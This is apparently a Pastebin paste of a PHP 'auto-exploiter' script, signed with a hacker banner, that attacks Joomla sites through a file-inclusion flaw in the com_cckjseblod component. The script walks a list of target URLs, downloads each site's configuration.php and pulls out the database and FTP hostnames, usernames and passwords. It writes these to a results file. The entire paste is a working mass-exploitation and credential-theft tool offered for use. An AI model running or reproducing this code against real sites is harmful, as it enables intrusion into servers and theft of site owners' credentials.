Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- // vedio explan for how is work script here : http://magsec.blogspot.com/2015/11/joomla-comcckjseblod-auto-exploiter.html
- @error_reporting(0);
- @set_time_limit(0);
- // pls dont change the rights pls :) The Hacker make tool not tool make a hacker ;)
- print "
- ____ __ __ _____ __ __
- | _ \ | \/ | / ____| | \/ |
- | |_) |_ _ | \ / | __ _| | __ _ __ ___ | \ / |
- | _ <| | | | | |\/| |/ _` | | |_ | '_ \ / _ \| |\/| |
- | |_) | |_| | | | | | (_| | |__| | | | | (_) | | | |
- |____/ \__, | |_| |_|\__,_|\_____|_| |_|\___/|_| |_|
- __/ | Joomla com_cckjseblod LFI
- |___/ visit my blog : magsec.blogspot.com for more tools
- Greetz : CodersLeeT - my Friends - incef - SJ Team - my brain <3 ^^
- " ;
- $g=@file_get_contents($argv[1]);
- $ss=explode("\r\n",$g);
- $open=fopen("result.html","a");
- foreach ($ss as $links){
- $lofe="$links/index.php?option=com_cckjseblod&task=download&file=configuration.php";
- $gg=@file_get_contents($lofe);
- if(preg_match("#class JConfig#",$gg)){
- echo "\n[+] $links ==> infected\n";fwrite($open,"<br>[+] $links <br>");
- preg_match("#tmp_path = '(.*?)\/tmp';#",$gg,$r);echo " [-] path of site : $r[1]/\n";fwrite($open,"path of site : $r[1] <br>");
- echo "\t[*]>--database informations --< \n"; ///// database info
- preg_match("#host = '(.*?)';#",$gg,$r);echo "\t\t[!] Host : $r[1]\n";fwrite($open,"host : $r[1] <br>");
- preg_match_all("#user = '(.*?)';#",$gg,$rr);echo "\t\t[!] user : ".$rr[1][1]."\n";$aaa=$rr[1][1];fwrite($open,"user :$aaa <br>");
- preg_match("#password = '(.*?)';#",$gg,$r);echo "\t\t[!] password : $r[1]\n";fwrite($open,"pass : $r[1] <br>");
- preg_match("#db = '(.*?)';#",$gg,$r);echo "\t\t[!] Database : $r[1]\n";fwrite($open,"db: $r[1] <br>");
- echo "\t[*]>--Ftp informations --< \n"; /////// ftp info
- preg_match("#ftp_enable = '(.*?)';#",$gg,$r);echo "\t\t[!] ftp enable : $r[1]\n";
- preg_match("#ftp_host = '(.*?)';#",$gg,$r);echo "\t\t[!] ftp_host : $r[1]\n";fwrite($open,"ftp-host : $r[1] <br>");
- preg_match("#ftp_port = '(.*?)';#",$gg,$r);echo "\t\t[!] ftp port : $r[1]\n";fwrite($open,"ftp-port : $r[1] <br>");
- preg_match("#ftp_user = '(.*?)';#",$gg,$r);echo "\t\t[!] ftp user : $r[1]\n";fwrite($open,"ftp-user : $r[1] <br>");
- preg_match("#ftp_pass = '(.*?)';#",$gg,$r);echo "\t\t[!] ftp pass : $r[1]\n";fwrite($open,"ftp-pass : $r[1] <br>");
- preg_match("#ftp_root = '(.*?)';#",$gg,$r);echo "\t\t[!] ftp root : $r[1]\n";
- }else{
- echo "\n[+] $links ==> Not infected\n";
- }
- }
- fclose($open);
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement